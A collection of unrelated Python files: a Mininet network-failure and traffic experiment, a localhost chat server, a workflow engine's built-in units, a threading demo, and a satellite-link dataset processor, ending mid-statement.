time.sleep(10)
info("Failure to trigger")
#switch.sendCmd("ifconfig s1-eth0 down")
#net.switches[4].cmd("ifconfig s5-eth1 down")
#net.switches[4].cmd("ifconfig s4-eth2 down")
info("Failure triggered\n")
#time.sleep(20)
#net.hosts[7].cmd("iperf -u -t 580 -c 10.0.0.2 -b 500M ") #150
info("new traffic triggered\n")
# net.switches[4].cmd("ifconfig s4-eth3 down")
def thread_console(net):
#net.hosts[8].sendCmd("iperf -u -t 600 -c 10.0.0.1 -b 500000000")
CLI(net)
def thread_t1(net):
#net.hosts[9].cmd("iperf -u -t 30 -c 10.0.0.1 -b 28M ")
#info("triggered traffic 1\n")
#net.hosts[9].cmd("iperf -u -t 40 -c 10.0.0.1 -b 42M ")
#info("triggered traffic 2\n")
#net.hosts[9].cmd("iperf -u -t 20 -c 10.0.0.1 -b 130M ")
#info("triggered traffic 3\n")
#net.hosts[9].cmd("iperf -u -t 30 -c 10.0.0.1 -b 70M ")
#info("triggered traffic 4\n")
#net.hosts[9].cmd("iperf -u -t 60 -c 10.0.0.1 -b 500M ")
#info("triggered traffic 5\n")
#net.hosts[9].cmd("iperf -u -t 30 -c 10.0.0.1 -b 30M ")
#info("triggered traffic 6\n")
#net.hosts[9].cmd("iperf -u -t 30 -c 10.0.0.1 -b 200M ")
#info("triggered traffic 7\n")
info("[%s] h10 to h1 : starting traffic 1\n", datetime.now())
net.hosts[9].cmd("iperf -u -t 160 -c 10.0.0.1 -b 300M ")
info("[%s] h10 to h1 : ended traffic 1, starting traffic 2\n",datetime.now())
# time.sleep(65)
net.hosts[9].cmd("iperf -u -t 360 -c 10.0.0.1 -b 800M ")
info("[%s] h10 to h1 : ended traffic 2\n",datetime.now())
def thread_t2(net):
info("h6 to h2 : starting traffic 1\n")
#
net.hosts[6].cmd("iperf -u -t 240 -c 10.0.0.2 -b 500M ") #150
info("[%s] h7 to h2 : ended traffic 1, starting failure\n",datetime.now())
net.switches[4].cmd("ifconfig s4-eth2 down")
info("[%s] h7 to h2 : ended failure, starting traffic 2\n",datetime.now())
net.hosts[6].cmd("iperf -u -t 30 -c 10.0.0.2 -b 500M ") #150
info("[%s] h7 to h2 : ended traffic 2\n",datetime.now())
net.hosts[6].cmd("iperf -u -t 30 -c 10.0.0.2 -b 500M ") #150
info("[%s] h7 to h2 : ended traffic 3\n",datetime.now())
net.hosts[6].cmd("iperf -u -t 30 -c 10.0.0.2 -b 500M ") #150
info("[%s] h7 to h2 : ended traffic 4\n",datetime.now())
net.hosts[6].cmd("iperf -u -t 30 -c 10.0.0.2 -b 500M ") #150
info("[%s] h7 to h2 : ended traffic 5\n",datetime.now())
net.hosts[6].cmd("iperf -u -t 500 -c 10.0.0.2 -b 500M ") #150
info("[%s] h7 to h2 : ended traffic 6\n",datetime.now())
# time.sleep(105)
# net.hosts[6].cmd("iperf -u -t 300 -c 10.0.0.7 -b 400M ")
# info("h6 to h2 : ended traffic 2\n")
class MultiSwitch( OVSSwitch ):
"Custom Switch() subclass that connects to different controllers"
def start( self, controllers ):
return OVSSwitch.start( self, [ cmap[ self.name ] ] )
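# MultiSwitch resolves its controller through the module-level 'cmap' below, so
# a hypothetical split such as cmap = {'s1': c1, 's2': c2} would attach switches
# to different controllers; in this script every switch maps to the single c1.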
c1 = RemoteController('c1', ip=sys.argv[1], port=6633)
cmap = { 's0': c1,'s1': c1, 's2': c1, 's3':c1, 's4':c1, 's5': c1, 's6': c1, 's7':c1, 's8':c1, 's9': c1, 's10': c1 }
#cmap = { 's1': c1}
net = Mininet(topo=None, cleanup=True, link=TCLink, autoSetMacs=True, switch=MultiSwitch, build=False )
for c in [ c1 ]:
net.addController(c)
hosts = []
for i in range(1,11):
hosts.append(net.addHost('h'+str(i)))
switches = []
for j in range(1,11):
switches.append(net.addSwitch('s'+str(j)))
#inner ring
net.addLink(switches[0], switches[1], 1,1)
net.addLink(switches[1], switches[2], 2,1)
net.addLink(switches[2], switches[3], 2,1)
net.addLink(switches[3], switches[4], 2,1)
net.addLink(switches[4], switches[0], 2,2)
#outer switches
net.addLink(switches[0], switches[5], 3,1)
net.addLink(switches[1], switches[6], 3,1)
net.addLink(switches[2], switches[7], 3,1)
net.addLink(switches[3], switches[8], 3,1)
net.addLink(switches[4], switches[9], 3,1)
#hosts
net.addLink(switches[5], hosts[0], 2)
net.addLink(switches[5], hosts[1], 3)
net.addLink(switches[6], hosts[2], 2)
net.addLink(switches[6], hosts[3], 3)
net.addLink(switches[7], hosts[4], 2)
net.addLink(switches[7], hosts[5], 3)
net.addLink(switches[8], hosts[6], 2)
net.addLink(switches[8], hosts[7], 3)
net.addLink(switches[9], hosts[8], 2)
net.addLink(switches[9], hosts[9], 3)
#net.addLink(switches[10], hosts[9], 2)
#net.addLink(switches[10], hosts[10], 3)
info( '*** Starting network\n')
net.build()
net.start()
#tl = threading.Thread(target=thread_launch,args=(net, ))
#tl.start()
#info("Started network\n")
#tt1 = threading.Thread(target=thread_traffic,args=(net,8,'10.0.0.1', ))
#tt1 = threading.Thread(target=thread_traffic,args=(net,9,'10.0.0.1', '67M', ))
#tt2 = threading.Thread(target=thread_traffic,args=(net,9,'10.0.0.1', '42M', ))
#tl.join()
#tt2.start()
#tt1.start()
#time.sleep(30)
#net.dumpNodeConnections( net.nodelist )
#for node in net.nodeList:
theLinks = []
for node in net.items():
info( '%s\n' % repr( node[1] ) )
info('\n----------------\n')
for lk in net.links: #linksBetween(switches[9],hosts[8])
#info('%s\n' % repr(lk.intf1))
info(lk.intf1.name+'<->'+lk.intf2.name+' '+lk.status()+"\n")
info(lk.intf1.name+ ' ['+lk.intf1.mac+']<->'+lk.intf2.name+ '['+lk.intf2.mac+']\n')
t1 = threading.Thread(target=thread_t1,args=(net, ))
info(" t1 created\n")
t2 = threading.Thread(target=thread_t2,args=(net, ))
info(" t2 created\n")
t2.start()
info(" t2 started\n")
t1.start()
info(" t1 started\n")
tf = threading.Thread(target=thread_failure,args=(net, ))
tf.start()
info(" t failure started\n")
tf.join()
info(" tf joined\n")
info('-------------------\n')
for lk in net.links: #linksBetween(switches[9],hosts[8])
info(lk.intf1.name+'<->'+lk.intf2.name+' '+lk.status()+"\n")
t2.join()
info(" t2 joined\n")
t1.join()
info(" t1 joined\n")
#time.sleep(10)
#net.hosts[9].cmd("iperf -u -t 30 -c 10.0.0.1 -b 28M ")
#info("triggered traffic 1\n")
#net.hosts[9].cmd("iperf -u -t 40 -c 10.0.0.1 -b 42M ")
#info("triggered traffic 2\n")
#net.hosts[9].cmd("iperf -u -t 20 -c 10.0.0.1 -b 130M ")
#info("triggered traffic 3\n")
#net.hosts[9].cmd("iperf -u -t 30 -c 10.0.0.1 -b 70M ")
#info("triggered traffic 4\n")
#net.hosts[9].cmd("iperf -u -t 60 -c 10.0.0.1 -b 500M ")
#info("triggered traffic 5\n")
#net.hosts[9].cmd("iperf -u -t 30 -c 10.0.0.1 -b 30M ")
#info("triggered traffic 6\n")
#net.hosts[9].cmd("iperf -u -t 30 -c 10.0.0.1 -b 200M ")
#info("triggered traffic 7\n")
#tt2.start()
#net.hosts[9].sendCmd("iperf -u -t 90 -c 10.0.0.1 -b 30M ")
#info("triggered traffic 2\n")
#tf = threading.Thread(target=thread_failure,args=(net, ))
#tf.start()
#info("triggered failure")
# tc = threading.Thread(target=thread_console,args=(net, ))
# tc.start()
# info("Triggered Terminal")
#tl.join()
#tt1.join()
#tt1.join()
#info("Completed 1 joins")
#tt2.join()
#tl.join()
#tf.join()
#tc.join()
#info("Completed 2 joins")
#time.sleep(240)
net.stop()
|
task_4_server.py
|
import socket
import threading
def display_msg(author, msg):
for client in clients:
if author != client:
client.send(msg.encode())
def client_handler(sock, address):
print(f"{address[0]}:{address[1]} connected")
while True:
message = sock.recv(16384).decode("utf-8")
if len(message) == 0:
break
message = f"{address[0]}:{address[1]}: " + message
display_msg(sock, message)
print(f"{address[0]}:{address[1]} disconnected")
clients.remove(sock)
sock.close()
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = ("127.0.0.1", 9090)
serversocket.bind(server_address)
serversocket.listen(100)
clients = []
print(f"Starting Chat Server at {server_address[0]}:{server_address[1]}")
try:
while True:
clientsocket, client_address = serversocket.accept()
if clientsocket not in clients:
clients.append(clientsocket)
client_thread = threading.Thread(target=client_handler, args=(clientsocket, client_address))
client_thread.start()
except KeyboardInterrupt:
print("\n" + "Shutting down" + "\n")
serversocket.close()
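# A minimal client sketch that pairs with this server (the host/port mirror the
# literals above; everything else is illustrative and not part of the original task):
#
#   import socket, threading
#
#   def reader(sock):
#       while True:
#           data = sock.recv(16384)
#           if not data:
#               break
#           print(data.decode("utf-8"))
#
#   client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   client.connect(("127.0.0.1", 9090))
#   threading.Thread(target=reader, args=(client,), daemon=True).start()
#   while True:
#       client.send(input().encode("utf-8"))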
|
builtin_units.py
|
import os, logging
from alchemy import engine, flow, unit
log = logging.getLogger(__name__)
def foreach(ctx, item, iteron, units, dryrun=False):
newctx = ctx
ui_list = [unit.create_unit_inst_from_dict(d) for d in units]
for i in iteron:
newctx.values[item] = i
engine.run_ui_list(newctx, ui_list, allow_flow=True)
def spawn_thread(ctx, units, name=None, join=False, newctx=False, dryrun=False):
from threading import Thread
def target_fn(ctx, ui_list, allow_flow = False):
try:
engine.run_ui_list(ctx, ui_list, allow_flow = allow_flow)
        except Exception as e:
log.exception(e)
ctx.fault_obj = e
ctx.fault = True
log.info("Spawing thread, name = %s", name)
if newctx:
ctx = engine.clone_context(ctx)
ui_list = [unit.create_unit_inst_from_dict(d) for d in units]
t = Thread(target=target_fn, name=name, args=(ctx, ui_list), kwargs={'allow_flow': True})
t.start()
if join:
t.join()
        if getattr(ctx, 'fault_obj', None):
            raise ctx.fault_obj
def print_ctx(ctx, param_list):
"""
param_list: List of context variables to be printed. If null, then print all
"""
print "--- ctx start --"
if param_list is None:
for key, value in ctx.values.iteritems():
print "{0} = {1}".format(key, value)
else:
for p in param_list:
try:
print "{0} = {1}".format(p, ctx.values[p])
except KeyError:
print "Param [%s] not found" % p
print "--- ctx end --"
def define_context(ctx, varmap, dryrun=False):
"""
values: Dict of values, where each key:value is a mapping to set the context
out: Updates the context directly
Example:
values:
a: $b
c: 1
d: "hello"
This defines 3 context variables a,c & d. The value of a is set as the
value of context var 'b'
"""
new_values = engine.resolve_dict(ctx, varmap)
if dryrun:
return varmap
ctx.values.update(new_values)
def loop(ctx, count, units, dryrun=False):
ui_list = [unit.create_unit_inst_from_dict(d) for d in units]
for _ in range(count):
engine.run_ui_list(ctx, ui_list, allow_flow=True)
def run_command(ctx, cmd, errordup = False, background = False, ignore_error = False, dryrun=False):
"""
cmd: The command string e.g. "uname -a"
    errordup: (False) Duplicate stderr to stdout
background: (False) Run the command in background i.e. the unix '&'
ignore_error: (False) Do not fault if the cmd fails with non-exit code
out:
status_code: The OS exit code of a process
stdout: The stdout stream
stderr: The stderr stream
"""
if dryrun:
return {
'status_code': None,
'stdout': None,
'stderr': None,
}
cmd = cmd.format(**ctx.values)
import subprocess
o_status_code = 0
o_stdout = None
o_stderr = None
if errordup:
o_stderr = subprocess.STDOUT
else:
o_stderr = subprocess.PIPE
if background:
        out = subprocess.Popen(cmd, shell=True)
        o_status_code = None  # background process: no exit status available yet
        o_stdout = None
        o_stderr = None
else:
        out = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=o_stderr, universal_newlines=True)
        o_stdout = out.communicate()[0].split('\n')
        o_status_code = out.returncode  # only valid after communicate() has waited for the process
unit_status = True
if not ignore_error and (o_status_code is not None and o_status_code != 0):
unit_status = False
return {
'_status': unit_status,
'status_code': o_status_code,
'stdout': o_stdout,
'stderr': o_stderr,
}
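# Illustrative call (output values are examples only, not guaranteed):
#   run_command(ctx, "uname -a")
#   -> {'_status': True, 'status_code': 0, 'stdout': ['Linux host ...', ''], ...}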
def print_stream(stream, dryrun = False):
"""
stream: Any valid file like object or stdout, strerr
"""
if dryrun:
return
if not stream:
return
for line in stream:
        print(line.rstrip())
def cli_args_positional(spec, dryrun=False):
"""
spec: list of positional args
out:
'spec: [a,b]' gets converted to ctx params 'input_a', 'input_b'
"""
if dryrun:
args = {}
for arg in spec:
args['input_' + arg] = ""
return args
import sys
if len(sys.argv[4:]) < len(spec):
print "Error: not enough args"
print "args:", " ".join(["<{0}>".format(a) for a in spec])
raise Exception("Not enough CLI args")
args = {}
for i, arg in enumerate(spec):
args['input_' + arg] = sys.argv[3 + i+1]
return args
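# Reading the code above: the value at sys.argv[4 + i] is exported as the context
# variable 'input_<spec[i]>'; the earlier argv slots are presumably consumed by the
# alchemy CLI itself.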
def to_int(ctx, varlist, dryrun=False):
    """
    varlist: List of context parameters
    out:
        Updates the context after the type conversion
    """
    if dryrun:
        return {v: None for v in varlist}
    return {v: int(ctx.values[v]) for v in varlist}
def parse_yaml_file(filename):
"""
filename: Input Yaml filepath
out:
export data as is into the context
"""
try:
import yaml
with open(filename) as f:
            data = yaml.safe_load(f)
return data
except Exception as e:
print "Error: unable to open yml file: %s, err = %s" % (filename, str(e))
return {
'_status': False
}
def env_values(varlist, dryrun=False):
"""
varlist: List of env variables
out:
Each env var X is exported as ENV_X in the context
"""
if dryrun:
return {"ENV_" + v: None for v in varlist}
ctx_vars = {}
for v in varlist:
ctx_vars["ENV_" + v] = os.environ[v]
return ctx_vars
def to_list(ctx, varlist):
"""
varlist: Values to be converted to python list by resolving the parameters
out:
list: List of values after resolving
Example:
varlist:
- 1
- 2
- $x
If the x == 10 then output will be [1,2,10]
"""
l = engine.resolve_list(ctx, varlist)
return {'list': l}
def delete_ctx(ctx, varlist):
"""
varlist: List of context variables which need to be deleted
"""
for v in varlist:
del ctx.values[v]
def ctx_required(ctx, varlist, dryrun=False):
"""
varlist: List of context variables which must exist in the context
"""
if dryrun:
return {v: '' for v in varlist}
for v in varlist:
if not v in ctx.values:
raise Exception("Context variable [%s] is required but not found" % v)
def dict_to_ctx(dict_var, keys = None):
if not isinstance(dict_var, dict):
raise Exception("Dict to ctx, the dict_var must be a dict")
if keys is None:
return dict_var
else:
d = {}
for k in keys:
d[k] = dict_var[k]
return d
def to_str(var):
return {'str_var': str(var)}
def query_dict(ctx, dict_var, pathmap, separator = '/', dryrun=False):
if dryrun:
return pathmap
    for ctx_var, dict_path in pathmap.items():
keylist = dict_path.split(separator)
val = dict_var
for key in keylist:
if not isinstance(val, dict):
raise Exception("Key=[%s] in path=[%s] is not a dict" % (key, dict_path))
try:
val = val[key]
except KeyError:
raise Exception("key=[%s] in path=[%s] not found" % (key, dict_path))
ctx.values[ctx_var] = val
def write_yaml_file(yaml_data, filepath):
import yaml
with open(filepath, "w") as f:
data = yaml.dump(yaml_data)
f.write(data)
def load_yaml_file(filepath, dryrun=False):
if dryrun:
return {'yaml_data': ''}
import yaml
with open(filepath) as f:
        y = yaml.safe_load(f)
return {'yaml_data': y}
def format_str(ctx, varmap, dryrun=False):
if dryrun:
return varmap
log.info("format-str varmap: %s", varmap)
ret = {}
    for key, pattern in varmap.items():
log.info("format_str: exporting var = %s", key)
ret[key] = pattern.format(**ctx.values)
return ret
if __name__ == '__main__':
class A:
pass
c = A()
c.values = {}
d = {
'a': {
'b': 10,
'c': {
'c1': [1,2,3]
}
}
}
path = {
'x': 'a/b',
'y': 'a/c',
'z': 'a/c/c1',
}
query_dict(c, d, path)
    print(c.values)
|
th.py
|
###### Multithreading: daemon thread test
import time
import threading
def fun():
for i in range(5):
# print("start fun")
time.sleep(1)
print("fun1")
def fun2(a):
while 1:
time.sleep(1)
print(a,"end fun2")
def main():
# print("main thread")
t1 = threading.Thread(target=fun,args=())
t2 = threading.Thread(target=fun2, args=(2,))
# t1.setDaemon(False)
    t2.daemon = True
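    # Daemon threads are killed automatically when the main thread exits, so
    # fun2's infinite loop does not keep the process alive.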
t1.start()
t2.start()
# time.sleep(2)
# t1.join()
# t2.join()
# print("main thread end")
if __name__ == '__main__':
main()
|
aer_dataset.py
|
from tqdm import tqdm
import pandas as pd
from path import Path
import random
import math
import numpy as np
import itertools
import datetime
import os
import networkx as nx
from utils.tool import time_stat,get_now
from components.AcTik import Tik
import threading
from components.measurement import Procedure,get_df
from utils.tool import json2dict,dict2json,to_csv,read_csv
import errno
class AerDataset:
def __init__(self,config,terminal=False):
pass
self.path = Path(config['path'])
self.terminal = terminal
#data prep
self.doOrNot = bool(config['Do'])
self.assigned_units = config['assigned_units']
self.access_portion = config['access_portion']
self.time_duration = config['time_duration']
self.files = []
for file in config['files']:
self.files.append(self.path / file)
self.dump_file = self.path / "{}.csv".format(config['dump_stem'])
#data align
self.algorithm_base = config['algorithm_base']
self.input_metrics = config['input_metrics']
self.output_metrics = config['output_metrics']
self.access_len = 0
#time_dir = datetime.datetime.now().strftime("%m-%d-%H:%M")
self.data_description={}
def get_time(self,t):
return self.df_align.index[t]
def is_equal(self, s1, s2, tk):
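        # True when the curves of s1 and s2 swap order between ticks tk-1 and tk,
        # i.e. the two accesses intersect somewhere in that interval.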
try:
a, b = tuple(self.df_align.query(" time >={} and time <={}".format(tk - 1, tk))[s1])
c, d = tuple(self.df_align.query(" time >={} and time <={}".format(tk - 1, tk))[s2])
        except (ValueError, KeyError):  # the unpacking above fails unless the query returns exactly two rows
print("equal func wrong at {},{},{}".format(s1,s2,tk))
return
if (a > c and b < d) or (a < c and b > d):
return True
else:
return False
def description(self):
print("DATA DESCRIPTION")
for k,v in self.data_description.items():
print("-> {},:{}",k,v)
def passes_stat(self):
for key, value in self.crossLog.items():
print("{}: {}".format(key, len((value))))
def get_sublines(self, access_name, value, with_time=False):
'''
hidden param
self.crossLog
self.df
called by
self.load_align
out
:param access_name:
:param value_names:
:param with_time:
:return:
'''
for start, end in self.crossLog[access_name]:
if with_time:
sub_df = self.df.query("access == '{}' and time >={} and time <={}".format(access_name, start, end))[
['time'] + value]
else:
sub_df = self.df.query("access == '{}' and time >={} and time <={}".format(access_name, start, end))[
value]
yield np.array(sub_df)
def data_append_value(self,df,input_metrics,output_metrics):
#append the data to df
# freq = 12e9#12GHz
# opt_v = 3e8#300k
# wave_lambda = 0.025# m
# Pr = (wave_lambda)**2/( 4*math.pi*df['Range (km)'].astype(float)*1e3)**2
# data = np.log10(Pr*1000)
#
f = 12 #Ghz
log_2_10 = 3.321928094887362
lg12 = 1.0791812
EIRP = 35 #dBW
GT = 8.53 #dBi/K
Gt = 40 #dB
Gr = 40 #dB
k = -228.6 #dBW/K
L = 30 #dB
B = 2 #GHz
# d = df['Range (km)'].max() - df['Range (km)']
d = df[input_metrics]
d = d['Range (km)']
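        # Free-space path loss in dB, with d in km and f in GHz:
        #   Lf = 92.45 + 20*log10(d_km) + 20*log10(f_GHz)
        # e.g. d = 1000 km at f = 12 GHz gives Lf ~= 92.45 + 60 + 21.58 ~= 174 dB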
Lf = 92.45 + 20 * np.log10(d) + 20 * np.log10(f)
for item in output_metrics:
if item =='Cno(dBHz)':
Cno = EIRP +GT -k-Lf-100
Cno = Cno.rename( item)
df = pd.concat([df, Cno], axis=1)
if item =='CT(dBW/K)':
CT = EIRP + GT -Lf
CT = CT.rename(item)
df = pd.concat([df, CT], axis=1)
if item == 'Pr(dBW)':
Pr = EIRP + Gr - Lf+100
Pr = Pr.rename(item)
df = pd.concat([df, Pr], axis=1)
if item =='(Ct)Gbps':
pass
if item =='CT(W/K)' and 'CT(dBW/K)' in df.columns:
pass
return df
def data_prep(self):
'''
:param :
self.time_portion
self.access_portion
self.assigned_units
self.files
self.random_seed
:return:
a data frame file
'''
if self.doOrNot is False:
return
if self.terminal:
print("\nDATA PRE-PROCCESSING ...")
#input
files = self.files
assigned_units = self.assigned_units
input_metrics = self.input_metrics
output_metrics = self.output_metrics
names = ['access','idx', 'time', 'value']
# names_type = {'access':str,'idx':np.int32, 'time':np.float32}#, 'value':np.float32}
not_dup_columns=['value']
output_columns = ['access','idx','time']+assigned_units
dfs = []
if self.terminal:
print("-> regexing ...")
        for idx, (item, unit) in enumerate(zip(files, assigned_units)):  # load the files for the different value columns (range, range rate, ...)
df = pd.read_csv(filepath_or_buffer=item,
names=names,
encoding='utf-16',
delimiter=",|\t",
# converters=names_type
)
if unit=="Range (km)":
df['access'] = df['access'].str.replace(r'(.*)-(.*)', r'\1', regex=True)
df['access'] = df['access'].str.replace(r'Range',r'')
                df['access'] = df['access'].str.replace(r'\(.*?\)', r'', regex=True)
df['access'] = df['access'].str.replace(r'\s+', r'', regex=True)
elif unit=="RangeRate (km/sec)":
df['access'] = df['access'].str.replace(r'(.*)-(.*)', r'\1', regex=True)
                df['access'] = df['access'].str.replace(r'\(*\)', r'', regex=True)
df['access'] = df['access'].str.replace(r'(.*)/(.*)', r'', regex=True)
df['access'] = df['access'].str.replace(r'RangeRatekmsec',r'')
df['access'] = df['access'].str.replace(r'\s+', r'', regex=True)
df['access'] = df['access'].str.replace('term-To-','')
if idx>0:
df=df[not_dup_columns]
df=df.rename(columns={'value': unit})
dfs.append(df)
if self.terminal:
print('-> regex over')
df = pd.concat(dfs,axis=1)
df=df[output_columns]
df.replace(' ', 'nan', inplace=True)
df['time'] = df['time'].astype(float)
df = df.query('time%1==0')
df['time'].loc[:] = df['time'].loc[:].astype('int')
df['Range (km)'].loc[:] = df['Range (km)'].loc[:].astype('float64')
df = self.data_append_value(
df,
input_metrics=input_metrics,
output_metrics=output_metrics
)
if self.terminal:
print('-> data saved at:{}'.format(self.dump_file))
df.to_csv(self.dump_file, index=False)
def load_align(self,random_seed=None):
'''
:input:
self.dump_file
:return:
self.df = df #for data align
self.crossLog = crossLog
self.access_names = access_names
self.data_description = data_description
'''
if self.terminal:
print("\nDATA RE-LOADING AND ALIGN")
time_duration = self.time_duration
access_portion = self.access_portion
df = pd.read_csv(self.dump_file)
algorithm_base = self.algorithm_base
output_metrics = self.output_metrics
df['time'] = np.array(df['time']).astype(np.int32)
df['access'] = np.array(df['access']).astype(str)
if self.terminal:
print(df[['Range (km)']+output_metrics].describe())
if random_seed:
random.seed(random_seed)
# time selection
time_len = int(df['time'].max())
start=0
end= 0
if type(time_duration)==list:
start = math.floor(time_len * time_duration[0])
end = math.ceil(time_len * time_duration[1])
elif type(time_duration) == int:
start = random.randrange(0,time_len-time_duration)
end = start+time_duration
else:
print('ERROR IN TIME DURATION')
exit(-1)
df = df.query('time >= {} and time <={} '.format(start, end))
        # access selection
access_dict = dict(df['access'].value_counts())
access_names = list(access_dict.keys())
random.shuffle(access_names)
start = math.floor(len(access_names) * access_portion[0])
end = math.ceil(len(access_names) * access_portion[1])
access_names = access_names[start:end]
df = df.query('access in {} '.format(access_names))
# data type set
        # each access may pass over several times; record the timestamps, they are needed later for plotting and data processing
crossLog={}
for name in access_names:
time_seriers = df.query("access == '{}'".format(name))['time']
            # OR the forward/backward diffs to obtain the pass start/end time mask
fwd = time_seriers.diff(-1)
pwd = time_seriers.diff(1)
time_np = np.array(time_seriers)
inter_mask = np.array(((abs(fwd)>1 ) + (abs(pwd)>1)))
if time_np[0]%1 ==0:
inter_mask[0] =True
else:
inter_mask[1]=True
if time_np[-1]%1 ==0:
inter_mask[-1]=True
else:
inter_mask[-2]=True
            time_stamp = np.array(time_np[inter_mask])  # consecutive pairs mark a start and an end
cnt = 0
crossLog[name]=[]
            while cnt < len(time_stamp):  # 2*n timestamps means n passes
crossLog[name].append(
                    (math.ceil(time_stamp[cnt]), math.floor(time_stamp[cnt+1]))  # multiple passes are possible, hence append
)
cnt=cnt+2
self.crossLog = crossLog
self.df = df
#data align
time_access_names = access_names.copy()
time_access_names.insert(0, 'time')
df_align = pd.DataFrame(columns=time_access_names)
time_min = math.ceil(df['time'].min())
time_max = math.ceil(df['time'].max())
df_align_time = pd.Series(name='time', data=np.linspace(start=int(time_min), stop=int(time_max),
num=int(time_max - time_min + 1)))
df_align['time'] = np.array(df_align_time).astype(np.int32)
df_align.set_index(['time'], inplace=True)
# get time lines
for access_name in access_names:
for line, (start, end) in zip(self.get_sublines(access_name, algorithm_base), crossLog[access_name]):
sub_df = df.query("access == '{}' and time >={} and time <={}".format(access_name, start, end))[
['time'] + algorithm_base]
time_mask = (df_align.index >= start) * (df_align.index <= end)
try:
df_align[access_name][time_mask] = list(sub_df[algorithm_base[0]])
                    # if this goes wrong, check the original access file
                except Exception:
                    print("-> wrong in access: {}, check the original file".format(access_name))
# returns
data_description = {}
data_description['access_num'] = len(access_names)
data_description['time_min'] = time_min
data_description['time_max'] = time_max
self.data_description = data_description
self.access_names = access_names
self.df_align = df_align
def data_parse(self):
if self.terminal:
print('\n-> DATA PARSING...')
start = get_now()
self.__tiks_init()
self.__get_positions()
self.__get_acc2tk()
self.__accs_init()
time_stat(start)
def make_tik(self,all_tks_supremum,tiks ,start,stop):
for i in range(start,stop):
tk = all_tks_supremum[i]
            if tk in tiks:  # already handled (e.g. a boundary tick): skip it, don't abort the whole chunk
                continue
            # for tk in tqdm(all_tks_supremum):  # bottleneck: iterating every tk takes too long
row = self.df_align.loc[tk]
ss = list(row[True ^ pd.isnull(row)].index)
tik =Tik(tk)
# tiks[tk]['pass_in'] = []
# tiks[tk]['pass_out'] = []
# tiks[tk]['inter']=[]
for si in ss:
                if pd.isnull(self.df_align[si][tk-1]):  # si was NaN at the previous tick, so si passes in at this tick
tik.addPass(addPassIn=si)
# tik.passIn.add(si)
                if pd.isnull(self.df_align[si][tk+1]):  # si is NaN at the next tick, so si passes out at this tick
tik.addPass(addPassOut=si)
            for si, sj in itertools.combinations(ss, 2):  # for every pair, check whether they intersect
if self.is_equal(si,sj,tk):
                    if len(tik.getPass('Inter')) == 0:  # first intersection found at this tick
tik.addPass(addPassInter={si,sj})
continue#for
                    if tik.is_inInter(si) is False and tik.is_inInter(sj) is False:  # neither one belongs to an existing intersection set
tik.addPass(addPassInter={si,sj})
continue#for
                    # one of them already belongs to some intersection set, so merge {si, sj} into that set
i = 0
while not {si,sj}&tik.getPass('Inter')[i]:
i+=1
tik.getPass('Inter')[i]|={si,sj}
tik.rebuild()
if tik.class_id=='O':
pass
else:
tiks[tk]= tik
def __tiks_init(self):
'''
        Prepare the data for the algorithm; collect the tks.
args:
self.df_align
crossLog
:return:
self.all_tks
self.acc2tk
self.tk2acc
'''
        # How to detect intersections between the access curves quickly:
        # 1. argsort every row (the per-time ordering of the accesses)
        # 2. difference the resulting rank indices between consecutive rows
        # 3. any absolute change >= 1 means two curves crossed at that row
        # 4. in order to ...
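        # Tiny illustration of the idea (made-up values):
        #   t0: a=3, b=1 -> argsort order [b, a]
        #   t1: a=1, b=3 -> argsort order [a, b]
        # The order changed between t0 and t1, so the two curves crossed in
        # between; NaNs are mapped to +/-inf below so that passes in/out also
        # show up as order changes.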
argsort = np.argsort(np.array(self.df_align[self.access_names].replace(np.nan,np.inf)))
tk_mask1 = np.abs(argsort - np.concatenate([argsort[0].reshape(1,argsort.shape[1]),argsort[:-1]],0))>0
argsort = np.argsort(np.array(self.df_align[self.access_names].replace(np.nan, -np.inf)))
tk_mask2 = np.abs(argsort - np.concatenate([argsort[0].reshape(1, argsort.shape[1]), argsort[:-1]], 0)) > 0
tk_mask = tk_mask1 +tk_mask2
tk_mask_zip = tk_mask.sum(1)>0
        # the first and last rows (pass in / pass out) must also be flagged, so set them explicitly
tk_mask_zip[0] = True
tk_mask_zip[-1]=True
# 1. passes tks
crossLog_np = np.array(list(self.crossLog.values())).reshape([len(self.crossLog), 2])
pass_tks = list(np.array(list(self.crossLog.values())).reshape([len(self.crossLog)*2]))
pass_tks =list(set(pass_tks))
pass_tks.sort()
max_tks = crossLog_np.max()
min_tks = crossLog_np.min()
pass_out_tks = list(crossLog_np[:,1])
pass_out_tks.sort()
        # 2. all tks  # correct the pass-out times: the original pass-out timestamps are 1 s too late; the pass-in times are correct
all_tks = list(self.df_align[tk_mask_zip].index)
for i,tk in enumerate(all_tks):
if tk-1 in pass_out_tks:
all_tks[i] -=1
tk_mask_zip[tk-min_tks-1] = True
# tk_mask_zip[tk-min_tks] = False
all_tks_supremum = list(self.df_align[tk_mask_zip].index)
        # min_tks is the global start time, somewhere within 0..24*3600 s
if self.terminal:
print('--> all tks sup:{}'.format(len(all_tks_supremum)))
tiks = {}
        # handle the boundary ticks first
for tk in [min_tks,max_tks]:
row = self.df_align.loc[tk]
ss = list(row[True ^ pd.isnull(row)].index)
tik = Tik(tk)
[tik.addPass(addPassIn=si) for si in ss]
tik.rebuild()
if tik.class_id=='O':
pass
else:
tiks[tk]= tik
        # use multiple threads for the most time-consuming part
threads = []
if len(all_tks_supremum)<100:
pass
t = threading.Thread(target=self.make_tik, args=(all_tks_supremum, tiks, 1, len(all_tks_supremum)-1))
t.start()
threads.append(t)
else:
each_thread_carry = 10
for n in range(1,len(all_tks_supremum),each_thread_carry):
if n +each_thread_carry<=len(all_tks_supremum):
stop = n + each_thread_carry
else:
stop = len(all_tks_supremum)
t = threading.Thread(target=self.make_tik,args=(all_tks_supremum,tiks,n,stop))
threads.append(t)
t.start()
for t in threads:
t.join()
inter_tks = []
passIn_tks = []
passOut_tks = []
all_tks = list(tiks.keys())
for tk, tik in tiks.items():
if len(tik.passInter) != 0:
inter_tks.append(tk)
if len(tik.passIn)!=0:
passIn_tks.append(tk)
if len(tik.passOut) != 0:
passOut_tks.append(tk)
inter_tks.sort()
passIn_tks.sort()
passOut_tks.sort()
all_tks.sort()
#returns
self.inter_tks = inter_tks
self.passIn_tks = passIn_tks
self.passOut_tks = passOut_tks
self.all_tks = all_tks
self.tiks = tiks
#
if self.terminal:
print("--> tks init over, num of tks:"
"\n--> inter tks:{}".format(len(inter_tks)),
"\n--> pass in tks:{}".format(len(passIn_tks)),
"\n--> pass out tks:{}".format(len(passOut_tks)),
